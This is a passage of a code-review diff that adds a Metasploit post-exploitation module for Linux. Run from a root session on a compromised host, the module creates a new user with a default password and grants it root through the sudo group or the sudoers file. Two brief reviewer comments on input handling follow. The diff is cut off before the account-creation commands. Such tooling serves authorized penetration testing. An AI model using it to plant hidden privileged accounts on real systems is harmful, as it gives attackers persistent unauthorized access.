modules/post/linux/manage/adduser.rb

```diff
@@ -0,0 +1,247 @@
+        'Privileged' => false,
+        'SessionTypes' => %w[meterpreter shell],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options([
+      OptString.new('USERNAME', [ true, 'The username to create', 'metasploit' ]),
+      OptString.new('PASSWORD', [ true, 'The password for this user', 'Metasploit$1' ]),
+      OptString.new('SHELL', [true, 'Set the shell that the new user will use', '/bin/sh']),
+      OptString.new('HOME', [true, 'Set the home directory of the new user. Leave empty if user will have no home directory', '']),
+      OptString.new('GROUPS', [false, 'Set what groups the new user will be part of separated with a space', ''])
+    ])
+
+    register_advanced_options([
+      OptString.new('UseraddBinary', [false, 'Set binary used to set password if you dont want module to find it for you. Set this to \'MANUAL\' to run without binary', nil]),
+      OptEnum.new('SudoMethod', [false, 'Set the method that the new user can obtain root. SUDO_FILE adds the user directly to sudoers while GROUP adds the new user to the sudo group', 'GROUP', ['SUDO_FILE', 'GROUP', 'NONE']]),
+      OptEnum.new('MissingGroups', [true, 'Set how nonexisting groups are handled on the system. Either give an error in the module, ignore it and throw it out, or create the group on the system.', 'ERROR', ['ERROR', 'IGNORE', 'CREATE']]),
+    ])
+  end
+
+  def check_group_exists?(group_name, group_data)
+    return group_data =~ /^#{group_name}:/
+  end
+
+  def d_cmd_exec(command)
+    vprint_status(command)
+    print_status(cmd_exec(command))
+  end
+
+  def run
+    fail_with(Failure::NoAccess, 'Session isnt running as root') unless is_root?
+    fail_with(Failure::NotVulnerable, 'Cannot find a means to add a new user') unless datastore['UseraddBinary'] == 'MANUAL' || (datastore['UseraddBinary'] && command_exists?(datastore['UseraddBinary'])) || command_exists?('useradd') || command_exists?('adduser')
+    fail_with(Failure::NotFound, "Cannot find command on path given: #{datastore['UseraddBinary']}") if datastore['UseraddBinary'] && !(datastore['UseraddBinary'] == 'MANUAL' || command_exists?(datastore['UseraddBinary']))
+    fail_with(Failure::NotVulnerable, 'Cannot add user to sudo as sudoers doesnt exist') unless datastore['SudoMethod'] != 'SUDO_FILE' || file_exist?('/etc/sudoers')
+    fail_with(Failure::NotFound, 'Shell specified does not exist on system') unless command_exists?(datastore['SHELL'])
+    fail_with(Failure::BadConfig, "Username [#{datastore['USERNAME']}] is not a legal unix username.") unless datastore['USERNAME'] =~ /^[a-z][a-z0-9_-]{0,31}$/
+
+    # Encrypting password ahead of time
+    passwd = UnixCrypt::MD5.build(datastore['PASSWORD'])
+
+    # Adding sudo to groups if method is set to use groups
+    groups = datastore['GROUPS'].split
```

Comment:
We might want to update this to handle other misc. input characters such as multiple whitespaces, commas, etc

Reply:
Shouldnt that already be handled by the password datastore?